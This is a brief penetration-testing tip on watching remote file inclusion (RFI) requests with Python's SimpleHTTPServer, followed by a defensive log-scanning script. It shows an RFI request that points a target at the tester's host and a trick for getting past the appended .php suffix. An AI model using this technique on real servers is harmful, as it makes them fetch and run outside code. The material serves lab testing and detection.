  • Using SimpleHTTPServer to view GET requests when testing for RFI

  • If you want to see what GET requests are being sent to your server, you can set up SimpleHTTPServer and watch them arrive on the command line.

    Simply navigate to the directory you want to host (in my case /var/www/html/) and once in this directory, launch the service on a port you are not using.

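    For example (SimpleHTTPServer is the Python 2 module name; in Python 3 the same server is the http.server module):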

    root@kali~# python -m SimpleHTTPServer 8001

    You can now use something like Burp Repeater to send requests to the application under test and see exactly what the GET request looks like when it arrives at your server.

    So for example, from Burp Repeater you might send:

    192.168.179.159/content.php?route=http://192.168.179.149:8001/testrfi.php

    Yet when you view the output from SimpleHTTPServer, you see that the request it actually received was “GET /testrfi.php.php HTTP/1.0” 404.

    What is happening is that the server making the request to your SimpleHTTPServer appends .php to the path you supplied (hence the .php.php), so the file is not found and you get a 404.

    This is very helpful, as it means you can rename your “testrfi.php” file to “testrfi”. When you make the request from the remote server again, the appended .php produces a path that matches the original file name, and the page is served with a 200 code.

    Once you’ve finished, you can stop the service with Ctrl+Z and then completely kill the process (close port 8001) with:

    root@kali~# fuser -k 8001/tcp
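
The same test seen from the defender's side, as an added example that is not part of the original post: a request like the one sent from Burp Repeater above shows up in the target web server's access log as a query parameter whose value is an absolute URL. The function name, the combined log format and the sample lines below are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# One entry of a common/combined-format access log (assumed format).
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# A parameter value that is itself an absolute URL (scheme is case-insensitive).
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)


def find_url_parameters(log_line):
    """Return [(client, path, param, value)] for every query parameter
    whose decoded value is an absolute URL; [] for clean or unparsable lines."""
    match = LOG_RE.match(log_line)
    if not match:
        return []
    parts = urlsplit(match.group("target"))
    hits = []
    # parse_qsl percent-decodes names and values once, so an encoded
    # "http%3A%2F%2F..." value is compared in its decoded form.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if REMOTE_URL_RE.match(value):
            hits.append((match.group("client"), parts.path, name, value))
    return hits


# Constructed sample lines (not taken from a real server); the addresses
# reuse the lab addresses from the post.
SAMPLE_LOG = [
    '192.168.179.149 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /content.php?route=http://192.168.179.149:8001/testrfi.php HTTP/1.1" 200 512',
    '192.168.179.149 - - [01/Jan/2024:10:00:05 +0000] '
    '"GET /content.php?route=http%3A%2F%2F192.168.179.149%3A8001%2Ftestrfi HTTP/1.1" 200 498',
    '192.168.179.20 - - [01/Jan/2024:10:01:00 +0000] '
    '"GET /content.php?route=about HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for client, path, name, value in find_url_parameters(line):
            print(f"{client} sent a URL in {path}?{name}= -> {value}")
```

A hit only means a URL was supplied; whether the application fetched it is confirmed by outbound requests from the web server, which is what the SimpleHTTPServer output above records.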